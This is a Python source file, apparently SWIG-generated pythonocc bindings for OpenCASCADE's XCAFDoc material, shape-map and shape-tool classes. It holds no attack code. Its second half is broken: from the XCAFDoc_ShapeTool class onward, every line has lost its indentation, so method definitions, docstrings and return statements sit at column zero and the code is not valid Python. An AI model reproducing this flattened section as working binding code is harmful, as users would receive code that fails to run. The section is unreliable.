XCAFDoc_MaterialTool.ShapeTool = new_instancemethod(_XCAFDoc.XCAFDoc_MaterialTool_ShapeTool,None,XCAFDoc_MaterialTool)
XCAFDoc_MaterialTool.IsMaterial = new_instancemethod(_XCAFDoc.XCAFDoc_MaterialTool_IsMaterial,None,XCAFDoc_MaterialTool)
XCAFDoc_MaterialTool.GetMaterialLabels = new_instancemethod(_XCAFDoc.XCAFDoc_MaterialTool_GetMaterialLabels,None,XCAFDoc_MaterialTool)
XCAFDoc_MaterialTool.AddMaterial = new_instancemethod(_XCAFDoc.XCAFDoc_MaterialTool_AddMaterial,None,XCAFDoc_MaterialTool)
XCAFDoc_MaterialTool.SetMaterial = new_instancemethod(_XCAFDoc.XCAFDoc_MaterialTool_SetMaterial,None,XCAFDoc_MaterialTool)
XCAFDoc_MaterialTool.GetMaterial = new_instancemethod(_XCAFDoc.XCAFDoc_MaterialTool_GetMaterial,None,XCAFDoc_MaterialTool)
XCAFDoc_MaterialTool._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_MaterialTool__kill_pointed,None,XCAFDoc_MaterialTool)
XCAFDoc_MaterialTool.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_MaterialTool_GetHandle,None,XCAFDoc_MaterialTool)
XCAFDoc_MaterialTool_swigregister = _XCAFDoc.XCAFDoc_MaterialTool_swigregister
XCAFDoc_MaterialTool_swigregister(XCAFDoc_MaterialTool)
def XCAFDoc_MaterialTool_Set(*args):
    """Create (if it does not already exist) the MaterialTool attribute on a label.

    :param L:
    :type L: TDF_Label &
    :rtype: Handle_XCAFDoc_MaterialTool
    """
    # Module-level alias for the static C++ method; delegate to the C wrapper.
    handle = _XCAFDoc.XCAFDoc_MaterialTool_Set(*args)
    return handle
def XCAFDoc_MaterialTool_GetID(*args):
    """Return the GUID that identifies the MaterialTool attribute.

    :rtype: Standard_GUID
    """
    # Module-level alias for the static C++ method; delegate to the C wrapper.
    guid = _XCAFDoc.XCAFDoc_MaterialTool_GetID(*args)
    return guid
def XCAFDoc_MaterialTool_GetDensityForShape(*args):
    """Look up the material referred to by a shape label and return its density.

    Returns 0 when the shape has no associated material.

    :param ShapeL:
    :type ShapeL: TDF_Label &
    :rtype: float
    """
    # Module-level alias for the static C++ method; delegate to the C wrapper.
    density = _XCAFDoc.XCAFDoc_MaterialTool_GetDensityForShape(*args)
    return density
class Handle_XCAFDoc_MaterialTool(OCC.TDF.Handle_TDF_Attribute):
    """SWIG proxy for the OCCT smart pointer ``Handle_XCAFDoc_MaterialTool``."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """Wrap a new C++ handle; arguments are forwarded to the SWIG constructor."""
        _XCAFDoc.Handle_XCAFDoc_MaterialTool_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_MaterialTool(*args))
    DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_MaterialTool_DownCast)
    def __del__(self):
        # Narrowed from a bare ``except:``; shutdown-time failures are still
        # deliberately ignored.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except Exception:
            pass
# SWIG boilerplate: bind handle operations to the proxy and register it.
Handle_XCAFDoc_MaterialTool.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_MaterialTool_Nullify,None,Handle_XCAFDoc_MaterialTool)
Handle_XCAFDoc_MaterialTool.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_MaterialTool_IsNull,None,Handle_XCAFDoc_MaterialTool)
Handle_XCAFDoc_MaterialTool.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_MaterialTool_GetObject,None,Handle_XCAFDoc_MaterialTool)
Handle_XCAFDoc_MaterialTool._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_MaterialTool__kill_pointed,None,Handle_XCAFDoc_MaterialTool)
Handle_XCAFDoc_MaterialTool_swigregister = _XCAFDoc.Handle_XCAFDoc_MaterialTool_swigregister
Handle_XCAFDoc_MaterialTool_swigregister(Handle_XCAFDoc_MaterialTool)
def Handle_XCAFDoc_MaterialTool_DownCast(*args):
    # NOTE(review): this def is immediately shadowed by the rebinding on the
    # next line; kept exactly as emitted by SWIG.
    return _XCAFDoc.Handle_XCAFDoc_MaterialTool_DownCast(*args)
Handle_XCAFDoc_MaterialTool_DownCast = _XCAFDoc.Handle_XCAFDoc_MaterialTool_DownCast
class XCAFDoc_SequenceNodeOfGraphNodeSequence(OCC.TCollection.TCollection_SeqNode):
    """Sequence node holding a Handle_XCAFDoc_GraphNode — SWIG proxy of a TCollection instantiation."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :param I:
        :type I: Handle_XCAFDoc_GraphNode &
        :param n:
        :type n: TCollection_SeqNodePtr &
        :param p:
        :type p: TCollection_SeqNodePtr &
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_SequenceNodeOfGraphNodeSequence_swiginit(self,_XCAFDoc.new_XCAFDoc_SequenceNodeOfGraphNodeSequence(*args))
    def Value(self, *args):
        """
        :rtype: Handle_XCAFDoc_GraphNode
        """
        return _XCAFDoc.XCAFDoc_SequenceNodeOfGraphNodeSequence_Value(self, *args)
    def _kill_pointed(self):
        """_kill_pointed(XCAFDoc_SequenceNodeOfGraphNodeSequence self)"""
        return _XCAFDoc.XCAFDoc_SequenceNodeOfGraphNodeSequence__kill_pointed(self)
    def GetHandle(self):
        """GetHandle(XCAFDoc_SequenceNodeOfGraphNodeSequence self) -> Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence"""
        return _XCAFDoc.XCAFDoc_SequenceNodeOfGraphNodeSequence_GetHandle(self)
    def __del__(self):
        # Narrowed from a bare ``except:``; shutdown-time failures are still
        # deliberately ignored.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except Exception:
            pass
# SWIG boilerplate: bind the flat C wrappers as methods and register the proxy.
XCAFDoc_SequenceNodeOfGraphNodeSequence.Value = new_instancemethod(_XCAFDoc.XCAFDoc_SequenceNodeOfGraphNodeSequence_Value,None,XCAFDoc_SequenceNodeOfGraphNodeSequence)
XCAFDoc_SequenceNodeOfGraphNodeSequence._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_SequenceNodeOfGraphNodeSequence__kill_pointed,None,XCAFDoc_SequenceNodeOfGraphNodeSequence)
XCAFDoc_SequenceNodeOfGraphNodeSequence.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_SequenceNodeOfGraphNodeSequence_GetHandle,None,XCAFDoc_SequenceNodeOfGraphNodeSequence)
XCAFDoc_SequenceNodeOfGraphNodeSequence_swigregister = _XCAFDoc.XCAFDoc_SequenceNodeOfGraphNodeSequence_swigregister
XCAFDoc_SequenceNodeOfGraphNodeSequence_swigregister(XCAFDoc_SequenceNodeOfGraphNodeSequence)
class Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence(OCC.TCollection.Handle_TCollection_SeqNode):
    """SWIG proxy for the OCCT smart pointer ``Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence``."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """Wrap a new C++ handle; arguments are forwarded to the SWIG constructor."""
        _XCAFDoc.Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence(*args))
    DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_DownCast)
    def __del__(self):
        # Narrowed from a bare ``except:``; shutdown-time failures are still
        # deliberately ignored.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except Exception:
            pass
# SWIG boilerplate: bind handle operations to the proxy and register it.
Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_Nullify,None,Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence)
Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_IsNull,None,Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence)
Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_GetObject,None,Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence)
Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence__kill_pointed,None,Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence)
Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_swigregister = _XCAFDoc.Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_swigregister
Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_swigregister(Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence)
def Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_DownCast(*args):
    # NOTE(review): this def is immediately shadowed by the rebinding on the
    # next line; kept exactly as emitted by SWIG.
    return _XCAFDoc.Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_DownCast(*args)
Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_DownCast = _XCAFDoc.Handle_XCAFDoc_SequenceNodeOfGraphNodeSequence_DownCast
class XCAFDoc_ShapeMapTool(OCC.TDF.TDF_Attribute):
    """Attribute maintaining an indexed map of subshapes for a shape label — SWIG proxy."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def GetID(*args):
        """
        :rtype: Standard_GUID
        """
        return _XCAFDoc.XCAFDoc_ShapeMapTool_GetID(*args)
    GetID = staticmethod(GetID)
    def Set(*args):
        """
        * Create (if not exist) ShapeTool from XCAFDoc on <L>.
        :param L:
        :type L: TDF_Label &
        :rtype: Handle_XCAFDoc_ShapeMapTool
        """
        return _XCAFDoc.XCAFDoc_ShapeMapTool_Set(*args)
    Set = staticmethod(Set)
    def __init__(self, *args):
        """
        * Creates an empty tool
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_ShapeMapTool_swiginit(self,_XCAFDoc.new_XCAFDoc_ShapeMapTool(*args))
    def IsSubShape(self, *args):
        """
        * Checks whether shape <sub> is subshape of shape stored on label shapeL
        :param sub:
        :type sub: TopoDS_Shape &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_ShapeMapTool_IsSubShape(self, *args)
    def SetShape(self, *args):
        """
        * Sets representation (TopoDS_Shape) for top-level shape
        :param S:
        :type S: TopoDS_Shape &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_ShapeMapTool_SetShape(self, *args)
    def GetMap(self, *args):
        """
        :rtype: TopTools_IndexedMapOfShape
        """
        return _XCAFDoc.XCAFDoc_ShapeMapTool_GetMap(self, *args)
    def _kill_pointed(self):
        """_kill_pointed(XCAFDoc_ShapeMapTool self)"""
        return _XCAFDoc.XCAFDoc_ShapeMapTool__kill_pointed(self)
    def GetHandle(self):
        """GetHandle(XCAFDoc_ShapeMapTool self) -> Handle_XCAFDoc_ShapeMapTool"""
        return _XCAFDoc.XCAFDoc_ShapeMapTool_GetHandle(self)
    def __del__(self):
        # Narrowed from a bare ``except:``; shutdown-time failures are still
        # deliberately ignored.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except Exception:
            pass
# SWIG boilerplate: bind the flat C wrappers as methods and register the proxy.
XCAFDoc_ShapeMapTool.IsSubShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeMapTool_IsSubShape,None,XCAFDoc_ShapeMapTool)
XCAFDoc_ShapeMapTool.SetShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeMapTool_SetShape,None,XCAFDoc_ShapeMapTool)
XCAFDoc_ShapeMapTool.GetMap = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeMapTool_GetMap,None,XCAFDoc_ShapeMapTool)
XCAFDoc_ShapeMapTool._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeMapTool__kill_pointed,None,XCAFDoc_ShapeMapTool)
XCAFDoc_ShapeMapTool.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeMapTool_GetHandle,None,XCAFDoc_ShapeMapTool)
XCAFDoc_ShapeMapTool_swigregister = _XCAFDoc.XCAFDoc_ShapeMapTool_swigregister
XCAFDoc_ShapeMapTool_swigregister(XCAFDoc_ShapeMapTool)
def XCAFDoc_ShapeMapTool_GetID(*args):
    """Return the GUID that identifies the ShapeMapTool attribute.

    :rtype: Standard_GUID
    """
    # Module-level alias for the static C++ method; delegate to the C wrapper.
    guid = _XCAFDoc.XCAFDoc_ShapeMapTool_GetID(*args)
    return guid
def XCAFDoc_ShapeMapTool_Set(*args):
    """Create (if it does not already exist) the ShapeMapTool attribute on label <L>.

    :param L:
    :type L: TDF_Label &
    :rtype: Handle_XCAFDoc_ShapeMapTool
    """
    # Module-level alias for the static C++ method; delegate to the C wrapper.
    handle = _XCAFDoc.XCAFDoc_ShapeMapTool_Set(*args)
    return handle
class Handle_XCAFDoc_ShapeMapTool(OCC.TDF.Handle_TDF_Attribute):
    """SWIG proxy for the OCCT smart pointer ``Handle_XCAFDoc_ShapeMapTool``."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """Wrap a new C++ handle; arguments are forwarded to the SWIG constructor."""
        _XCAFDoc.Handle_XCAFDoc_ShapeMapTool_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_ShapeMapTool(*args))
    DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_ShapeMapTool_DownCast)
    def __del__(self):
        # Narrowed from a bare ``except:``; shutdown-time failures are still
        # deliberately ignored.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except Exception:
            pass
# SWIG boilerplate: bind handle operations to the proxy and register it.
Handle_XCAFDoc_ShapeMapTool.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ShapeMapTool_Nullify,None,Handle_XCAFDoc_ShapeMapTool)
Handle_XCAFDoc_ShapeMapTool.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ShapeMapTool_IsNull,None,Handle_XCAFDoc_ShapeMapTool)
Handle_XCAFDoc_ShapeMapTool.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ShapeMapTool_GetObject,None,Handle_XCAFDoc_ShapeMapTool)
Handle_XCAFDoc_ShapeMapTool._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ShapeMapTool__kill_pointed,None,Handle_XCAFDoc_ShapeMapTool)
Handle_XCAFDoc_ShapeMapTool_swigregister = _XCAFDoc.Handle_XCAFDoc_ShapeMapTool_swigregister
Handle_XCAFDoc_ShapeMapTool_swigregister(Handle_XCAFDoc_ShapeMapTool)
def Handle_XCAFDoc_ShapeMapTool_DownCast(*args):
    # NOTE(review): this def is immediately shadowed by the rebinding on the
    # next line; kept exactly as emitted by SWIG.
    return _XCAFDoc.Handle_XCAFDoc_ShapeMapTool_DownCast(*args)
Handle_XCAFDoc_ShapeMapTool_DownCast = _XCAFDoc.Handle_XCAFDoc_ShapeMapTool_DownCast
class XCAFDoc_ShapeTool(OCC.TDF.TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetID(*args)
GetID = staticmethod(GetID)
def Set(*args):
"""
* Create (if not exist) ShapeTool from XCAFDoc on <L>.
:param L:
:type L: TDF_Label &
:rtype: Handle_XCAFDoc_ShapeTool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_Set(*args)
Set = staticmethod(Set)
def __init__(self, *args):
"""
* Creates an empty tool Creates a tool to work with a document <Doc> Attaches to label XCAFDoc::LabelShapes()
:rtype: None
"""
_XCAFDoc.XCAFDoc_ShapeTool_swiginit(self,_XCAFDoc.new_XCAFDoc_ShapeTool(*args))
def IsTopLevel(self, *args):
"""
* Returns True if the label is a label of top-level shape, as opposed to component of assembly or subshape
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsTopLevel(self, *args)
def IsFree(*args):
"""
* Returns True if the label is not used by any assembly, i.e. contains sublabels which are assembly components This is relevant only if IsShape() is True (There is no Father TreeNode on this <L>)
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsFree(*args)
IsFree = staticmethod(IsFree)
def IsShape(*args):
"""
* Returns True if the label represents a shape (simple shape, assembly or reference)
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsShape(*args)
IsShape = staticmethod(IsShape)
def IsSimpleShape(*args):
"""
* Returns True if the label is a label of simple shape
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsSimpleShape(*args)
IsSimpleShape = staticmethod(IsSimpleShape)
def IsReference(*args):
"""
* Return true if <L> is a located instance of other shape i.e. reference
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsReference(*args)
IsReference = staticmethod(IsReference)
def IsAssembly(*args):
"""
* Returns True if the label is a label of assembly, i.e. contains sublabels which are assembly components This is relevant only if IsShape() is True
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsAssembly(*args)
IsAssembly = staticmethod(IsAssembly)
def IsComponent(*args):
"""
* Return true if <L> is reference serving as component of assembly
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsComponent(*args)
IsComponent = staticmethod(IsComponent)
def IsCompound(*args):
"""
* Returns True if the label is a label of compound, i.e. contains some sublabels This is relevant only if IsShape() is True
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsCompound(*args)
IsCompound = staticmethod(IsCompound)
def IsSubShape(self, *args):
"""
* Return true if <L> is subshape of the top-level shape
:param L:
:type L: TDF_Label &
:rtype: bool
* Checks whether shape <sub> is subshape of shape stored on label shapeL
:param shapeL:
:type shapeL: TDF_Label &
:param sub:
:type sub: TopoDS_Shape &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsSubShape(self, *args)
def SearchUsingMap(self, *args):
"""
:param S:
:type S: TopoDS_Shape &
:param L:
:type L: TDF_Label &
:param findWithoutLoc:
:type findWithoutLoc: bool
:param findSubshape:
:type findSubshape: bool
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_SearchUsingMap(self, *args)
def Search(self, *args):
"""
* General tool to find a (sub) shape in the document * If findInstance is True, and S has a non-null location, first tries to find the shape among the top-level shapes with this location * If not found, and findComponent is True, tries to find the shape among the components of assemblies * If not found, tries to find the shape without location among top-level shapes * If not found and findSubshape is True, tries to find a shape as a subshape of top-level simple shapes Returns False if nothing is found
:param S:
:type S: TopoDS_Shape &
:param L:
:type L: TDF_Label &
:param findInstance: default value is Standard_True
:type findInstance: bool
:param findComponent: default value is Standard_True
:type findComponent: bool
:param findSubshape: default value is Standard_True
:type findSubshape: bool
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_Search(self, *args)
def FindShape(self, *args):
"""
* Returns the label corresponding to shape S (searches among top-level shapes, not including subcomponents of assemblies) If findInstance is False (default), searches for the non-located shape (i.e. among original shapes) If findInstance is True, searches for the shape with the same location, including shape instances Return True if <S> is found.
:param S:
:type S: TopoDS_Shape &
:param L:
:type L: TDF_Label &
:param findInstance: default value is Standard_False
:type findInstance: bool
:rtype: bool
* Does the same as previous method Returns Null label if not found
:param S:
:type S: TopoDS_Shape &
:param findInstance: default value is Standard_False
:type findInstance: bool
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ShapeTool_FindShape(self, *args)
def GetShape(*args):
"""
* To get TopoDS_Shape from shape's label For component, returns new shape with correct location Returns False if label does not contain shape
:param L:
:type L: TDF_Label &
:param S:
:type S: TopoDS_Shape &
:rtype: bool
* To get TopoDS_Shape from shape's label For component, returns new shape with correct location Returns Null shape if label does not contain shape
:param L:
:type L: TDF_Label &
:rtype: TopoDS_Shape
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetShape(*args)
GetShape = staticmethod(GetShape)
def NewShape(self, *args):
"""
* Creates new (empty) top-level shape. Initially it holds empty TopoDS_Compound
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ShapeTool_NewShape(self, *args)
def SetShape(self, *args):
"""
* Sets representation (TopoDS_Shape) for top-level shape
:param L:
:type L: TDF_Label &
:param S:
:type S: TopoDS_Shape &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_SetShape(self, *args)
def AddShape(self, *args):
"""
* Adds a new top-level (creates and returns a new label) If makeAssembly is True, treats TopAbs_COMPOUND shapes as assemblies (creates assembly structure). NOTE: <makePrepare> replace components without location in assmebly by located components to avoid some problems. If AutoNaming() is True then automatically attaches names.
:param S:
:type S: TopoDS_Shape &
:param makeAssembly: default value is Standard_True
:type makeAssembly: bool
:param makePrepare: default value is Standard_True
:type makePrepare: bool
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ShapeTool_AddShape(self, *args)
def RemoveShape(self, *args):
"""
* Removes shape (whole label and all its sublabels) If removeCompletely is true, removes complete shape If removeCompletely is false, removes instance(location) only Returns False (and does nothing) if shape is not free or is not top-level shape
:param L:
:type L: TDF_Label &
:param removeCompletely: default value is Standard_True
:type removeCompletely: bool
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_RemoveShape(self, *args)
def Init(self, *args):
"""
* set hasComponents into false
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_Init(self, *args)
def SetAutoNaming(*args):
"""
* Sets auto-naming mode to <V>. If True then for added shapes, links, assemblies and SHUO's, the TDataStd_Name attribute is automatically added. For shapes it contains a shape type (e.g. 'SOLID', 'SHELL', etc); for links it has a form '=>[0:1:1:2]' (where a tag is a label containing a shape without a location); for assemblies it is 'ASSEMBLY', and 'SHUO' for SHUO's. This setting is global; it cannot be made a member function as it is used by static methods as well. By default, auto-naming is enabled. See also AutoNaming().
:param V:
:type V: bool
:rtype: void
"""
return _XCAFDoc.XCAFDoc_ShapeTool_SetAutoNaming(*args)
SetAutoNaming = staticmethod(SetAutoNaming)
def AutoNaming(*args):
"""
* Returns current auto-naming mode. See SetAutoNaming() for description.
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_AutoNaming(*args)
AutoNaming = staticmethod(AutoNaming)
def ComputeShapes(self, *args):
"""
* recursive
:param L:
:type L: TDF_Label &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_ComputeShapes(self, *args)
def ComputeSimpleShapes(self, *args):
"""
* Compute a sequence of simple shapes
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_ComputeSimpleShapes(self, *args)
def GetShapes(self, *args):
"""
* Returns a sequence of all top-level shapes
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetShapes(self, *args)
def GetFreeShapes(self, *args):
"""
* Returns a sequence of all top-level shapes which are free (i.e. not referred by any other)
:param FreeLabels:
:type FreeLabels: TDF_LabelSequence &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetFreeShapes(self, *args)
def GetUsers(*args):
"""
* Returns list of labels which refer shape L as component Returns number of users (0 if shape is free)
:param L:
:type L: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:param getsubchilds: default value is Standard_False
:type getsubchilds: bool
:rtype: int
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetUsers(*args)
GetUsers = staticmethod(GetUsers)
def GetLocation(*args):
"""
* Returns location of instance
:param L:
:type L: TDF_Label &
:rtype: TopLoc_Location
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetLocation(*args)
GetLocation = staticmethod(GetLocation)
def GetReferredShape(*args):
"""
* Returns label which corresponds to a shape referred by L Returns False if label is not reference
:param L:
:type L: TDF_Label &
:param Label:
:type Label: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetReferredShape(*args)
GetReferredShape = staticmethod(GetReferredShape)
def NbComponents(*args):
"""
* Returns number of Assembles components
:param L:
:type L: TDF_Label &
:param getsubchilds: default value is Standard_False
:type getsubchilds: bool
:rtype: int
"""
return _XCAFDoc.XCAFDoc_ShapeTool_NbComponents(*args)
NbComponents = staticmethod(NbComponents)
def GetComponents(*args):
"""
* Returns list of components of assembly Returns False if label is not assembly
:param L:
:type L: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:param getsubchilds: default value is Standard_False
:type getsubchilds: bool
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetComponents(*args)
GetComponents = staticmethod(GetComponents)
def AddComponent(self, *args):
"""
* Adds a component given by its label and location to the assembly Note: assembly must be IsAssembly() or IsSimpleShape()
:param assembly:
:type assembly: TDF_Label &
:param comp:
:type comp: TDF_Label &
:param Loc:
:type Loc: TopLoc_Location &
:rtype: TDF_Label
* Adds a shape (located) as a component to the assembly If necessary, creates an additional top-level shape for component and return the Label of component. If expand is True and component is Compound, it will be created as assembly also Note: assembly must be IsAssembly() or IsSimpleShape()
:param assembly:
:type assembly: TDF_Label &
:param comp:
:type comp: TopoDS_Shape &
:param expand: default value is Standard_False
:type expand: bool
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ShapeTool_AddComponent(self, *args)
def RemoveComponent(self, *args):
"""
* Removes a component from its assembly
:param comp:
:type comp: TDF_Label &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_RemoveComponent(self, *args)
def UpdateAssembly(self, *args):
"""
* Update an assembly at label <L>
:param L:
:type L: TDF_Label &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_UpdateAssembly(self, *args)
def FindSubShape(self, *args):
"""
* Finds a label for subshape <sub> of shape stored on label shapeL Returns Null label if it is not found
:param shapeL:
:type shapeL: TDF_Label &
:param sub:
:type sub: TopoDS_Shape &
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_FindSubShape(self, *args)
def AddSubShape(self, *args):
"""
* Adds a label for subshape <sub> of shape stored on label shapeL Returns Null label if it is not subshape
:param shapeL:
:type shapeL: TDF_Label &
:param sub:
:type sub: TopoDS_Shape &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ShapeTool_AddSubShape(self, *args)
def FindMainShapeUsingMap(self, *args):
"""
:param sub:
:type sub: TopoDS_Shape &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ShapeTool_FindMainShapeUsingMap(self, *args)
def FindMainShape(self, *args):
"""
* Performs a search among top-level shapes to find the shape containing <sub> as subshape Checks only simple shapes, and returns the first found label (which should be the only one for valid model)
:param sub:
:type sub: TopoDS_Shape &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ShapeTool_FindMainShape(self, *args)
def GetSubShapes(*args):
"""
* Returns list of labels identifying subshapes of the given shape Returns False if no subshapes are placed on that label
:param L:
:type L: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetSubShapes(*args)
GetSubShapes = staticmethod(GetSubShapes)
def BaseLabel(self, *args):
"""
* returns the label under which shapes are stored
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ShapeTool_BaseLabel(self, *args)
def Dump(self, *args):
"""
:param deep: default value is Standard_False
:type deep: bool
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_Dump(self, *args)
def DumpShape(*args):
"""
* Print in cout type of shape found on <L> label and the entry of <L>, with <level> tabs before. If <deep>, print also TShape and Location addresses
:param L:
:type L: TDF_Label &
:param level: default value is 0
:type level: int
:param deep: default value is Standard_False
:type deep: bool
:rtype: void
"""
return _XCAFDoc.XCAFDoc_ShapeTool_DumpShape(*args)
DumpShape = staticmethod(DumpShape)
def IsExternRef(*args):
"""
* Returns True if the label is a label of external references, i.e. there are some reference on the no-step files, which are described in document only their names
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsExternRef(*args)
IsExternRef = staticmethod(IsExternRef)
def SetExternRefs(self, *args):
"""
* Sets the names of references on the no-step files
:param SHAS:
:type SHAS: TColStd_SequenceOfHAsciiString &
:rtype: TDF_Label
* Sets the names of references on the no-step files
:param L:
:type L: TDF_Label &
:param SHAS:
:type SHAS: TColStd_SequenceOfHAsciiString &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ShapeTool_SetExternRefs(self, *args)
def GetExternRefs(*args):
"""
* Gets the names of references on the no-step files
:param L:
:type L: TDF_Label &
:param SHAS:
:type SHAS: TColStd_SequenceOfHAsciiString &
:rtype: void
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetExternRefs(*args)
GetExternRefs = staticmethod(GetExternRefs)
